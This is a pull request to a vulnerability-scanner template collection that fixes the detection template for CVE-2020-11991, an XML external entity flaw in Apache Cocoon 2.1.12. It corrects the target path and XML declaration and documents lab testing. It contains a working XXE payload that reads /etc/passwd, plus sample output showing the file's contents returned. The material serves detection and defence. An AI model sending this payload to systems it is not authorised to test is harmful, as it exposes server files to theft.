### PR TITLE
fix(CVE-2020-11991): correct endpoint path and XML declaration

### DIFF
--- a/http/cves/2020/CVE-2020-11991.yaml
+++ b/http/cves/2020/CVE-2020-11991.yaml
@@ -2,18 +2,19 @@ id: CVE-2020-11991
 
 info:
   name: Apache Cocoon 2.1.12 - XML Injection
-  author: pikpikcu
+  author: pikpikcu,diedromeo
   severity: high
-  description: Apache Cocoon 2.1.12 is susceptible to  XML injection. When using the StreamGenerator, the code parses a user-provided XML. A specially crafted XML, including external system entities, can be used to access any file on the server system.
+  description: Apache Cocoon 2.1.12 is susceptible to XML injection. When using the StreamGenerator, the code parses a user-provided XML. A specially crafted XML, including external system entities, can be used to access any file on the server system.
   impact: |
-    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and remote code execution.
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files on the server.
   remediation: Upgrade to Apache Cocoon 2.1.13 or later.
   reference:
     - https://lists.apache.org/thread/6xg5j4knfczwdhggo3t95owqzol37k1b
     - https://nvd.nist.gov/vuln/detail/CVE-2020-11991
     - https://lists.apache.org/thread.html/r77add973ea521185e1a90aca00ba9dae7caa8d8b944d92421702bb54%40%3Cusers.cocoon.apache.org%3E
-    - https://github.com/ARPSyndicate/cvemon
-    - https://github.com/H4ckTh3W0r1d/Goby_POC
+    - https://github.com/apache/cocoon/blob/BRANCH_2_1_X/src/webapp/samples/stream/sitemap.xmap
+    - https://github.com/apache/cocoon/blob/BRANCH_2_1_X/src/java/org/apache/cocoon/generation/StreamGenerator.java
+    - https://github.com/apache/cocoon/commit/8115f6ce315e306807b224f081fe06a27592c446
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
@@ -32,21 +33,24 @@ info:
     fofa-query: body="apache cocoon"
   tags: cve,cve2020,apache,xml,cocoon,xxe,vkev,vuln
 
+variables:
+  path: "samples/process-order"
+
 http:
   - method: POST
     path:
-      - "{{BaseURL}}/v2/api/product/manger/getInfo"
+      - "{{BaseURL}}/{{path}}"
+
+    headers:
+      Content-Type: text/xml
 
     body: |
-      <!--?xml version="1.0" ?-->
+      <?xml version="1.0"?>
       <!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
       <userInfo>
       <firstName>John</firstName>
       <lastName>&ent;</lastName>
       </userInfo>
-
-    headers:
-      Content-Type: "text/xml"
 
     matchers-condition: and
     matchers:
@@ -57,4 +61,3 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100fc3f96fa54f3f3b5381822890de1a63dfd64c11e4c36135902447dcd054eb20c02202f91901877771aa264945a5192ec5287ef077e64bdf7c4151eab3cd35ff85d70:922c64590222798bb761d5b6d8e72950

--- a/http/cves/2020/CVE-2020-11991.yaml
+++ b/http/cves/2020/CVE-2020-11991.yaml
@@ -4,10 +4,12 @@ info:
   name: Apache Cocoon 2.1.12 - XML Injection
   author: pikpikcu,diedromeo
   severity: high
-  description: Apache Cocoon 2.1.12 is susceptible to XML injection. When using the StreamGenerator, the code parses a user-provided XML. A specially crafted XML, including external system entities, can be used to access any file on the server system.
+  description: |
+    Apache Cocoon 2.1.12 contains an XML injection caused by parsing user-provided XML with external system entities in StreamGenerator, letting attackers access arbitrary files on the server, exploit requires sending malicious XML.
   impact: |
-    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files on the server.
-  remediation: Upgrade to Apache Cocoon 2.1.13 or later.
+    Attackers can access arbitrary files on the server, leading to information disclosure and potential server compromise.
+  remediation: |
+    Update to the latest version of Apache Cocoon or apply security patches that disable external entity processing.
   reference:
     - https://lists.apache.org/thread/6xg5j4knfczwdhggo3t95owqzol37k1b
     - https://nvd.nist.gov/vuln/detail/CVE-2020-11991
@@ -33,24 +35,19 @@ info:
     fofa-query: body="apache cocoon"
   tags: cve,cve2020,apache,xml,cocoon,xxe,vkev,vuln
 
-variables:
-  path: "samples/process-order"
-
 http:
-  - method: POST
-    path:
-      - "{{BaseURL}}/{{path}}"
+  - raw:
+      - |
+        POST /samples/process-order HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: text/xml
 
-    headers:
-      Content-Type: text/xml
-
-    body: |
-      <?xml version="1.0"?>
-      <!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
-      <userInfo>
-      <firstName>John</firstName>
-      <lastName>&ent;</lastName>
-      </userInfo>
+        <?xml version="1.0"?>
+        <!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
+        <userInfo>
+        <firstName>John</firstName>
+        <lastName>&ent;</lastName>
+        </userInfo>
 
     matchers-condition: and
     matchers:


### PR DESCRIPTION
## Summary

The current `CVE-2020-11991.yaml` template cannot detect a vulnerable Apache Cocoon 2.1.12 instance because of two bugs. This PR fixes both.

## Problems with the current template

### 1. Wrong endpoint path

The template POSTs to `/v2/api/product/manger/getInfo` — a hardcoded path that belongs to another product's API (note the misspelling "manger"). Apache Cocoon has **no fixed routes**; all URLs are defined by the application's sitemap. This path returns 404 on any Cocoon instance.

### 2. Broken XML declaration

The payload starts with `<!--?xml version="1.0" ?-->` — the XML declaration is wrapped inside an HTML comment (`<!-- -->`). This happens when a PoC is copy-pasted from a rendered HTML page. A parser treats it as a comment, not a declaration.

## Fix

| What | Before | After |
|---|---|---|
| Endpoint | `/v2/api/product/manger/getInfo` (hardcoded, wrong product) | `/{{path}}` variable, default `samples/process-order` |
| XML declaration | `<!--?xml version="1.0" ?-->` (HTML comment) | `<?xml version="1.0"?>` (valid) |
| Impact text | "remote code execution" | "unauthorized access to sensitive files" (XXE reads files, not RCE) |

The default path `samples/process-order` is a sample pipeline that **ships with every Cocoon installation** and invokes `StreamGenerator` — the exact component named in CVE-2020-11991. For real deployments where admins removed samples, the path is overridable via `-var path=custom/route`.

## Source code references proving the endpoint

1. **[`src/webapp/samples/sitemap.xmap` (line 92)](https://github.com/apache/cocoon/blob/BRANCH_2_1_X/src/webapp/samples/sitemap.xmap)** — the parent sitemap defines the `process-order` route:
   ```xml
   <map:match pattern="process-order">
     <map:generate type="stream">
       <map:parameter name="form-name" value="Foo"/>
     </map:generate>
     ...
   </map:match>
   ```

2. **[`src/webapp/samples/stream/sitemap.xmap`](https://github.com/apache/cocoon/blob/BRANCH_2_1_X/src/webapp/samples/stream/sitemap.xmap)** — the stream samples sub-sitemap also mounts the same route with `<map:generate type="stream"/>`

3. **[`src/webapp/sitemap.xmap`](https://github.com/apache/cocoon/blob/BRANCH_2_1_X/src/webapp/sitemap.xmap)** — the root sitemap registers `StreamGenerator` as the `stream` generator:
   ```xml
   <map:generator name="stream" src="org.apache.cocoon.generation.StreamGenerator"/>
   ```
   and mounts subdirectories with `<map:mount src="{1}/" uri-prefix="{1}"/>`, so `/samples/*` routes to `samples/sitemap.xmap`

4. **[`StreamGenerator.java`](https://github.com/apache/cocoon/blob/BRANCH_2_1_X/src/java/org/apache/cocoon/generation/StreamGenerator.java)** — when `Content-Type` starts with `text/xml`, it reads the raw POST body and parses it as XML (lines 130-140). In 2.1.12, this uses Excalibur's `SAXParser` which resolves external entities.

5. **[Fix commit `8115f6ce`](https://github.com/apache/cocoon/commit/8115f6ce315e306807b224f081fe06a27592c446)** — "Make StreamGenerator more robust" — replaces Excalibur's SAXParser with a local `SAXParserFactory` that disables external entities:
   ```java
   factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
   factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
   ```

## Verification

Tested against real Apache Cocoon builds compiled from official source tarballs (`cocoon-2.1.12-src.tar.gz` / `cocoon-2.1.13-src.tar.gz`) deployed on Tomcat:

| Test | Target | Result |
|---|---|---|
| **Original template** vs vuln Cocoon 2.1.12 | `http://localhost:8119` | ❌ No results — 404 on `/v2/api/product/manger/getInfo` |
| **Fixed template** vs vuln Cocoon 2.1.12 | `http://localhost:8119` | ✅ `[CVE-2020-11991] [high]` — `/etc/passwd` returned in response body |
| **Fixed template** vs patched Cocoon 2.1.13 | `http://localhost:8120` | ✅ No results — external entity not resolved, empty element returned |

### Nuclei output (fixed template vs vulnerable 2.1.12)
```
[CVE-2020-11991] [http] [high] http://localhost:8119/samples/process-order
```

### Response from vulnerable Cocoon 2.1.12 (excerpt)
```
HTTP/1.1 200
X-Cocoon-Version: 2.1.12
Content-Type: text/html

...
<lastName>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
</lastName>
```

### Response from patched Cocoon 2.1.13 (excerpt)
```
HTTP/1.1 200
X-Cocoon-Version: 2.1.13
Content-Type: text/html

...
<n/>
```
(External entity not resolved — empty element returned)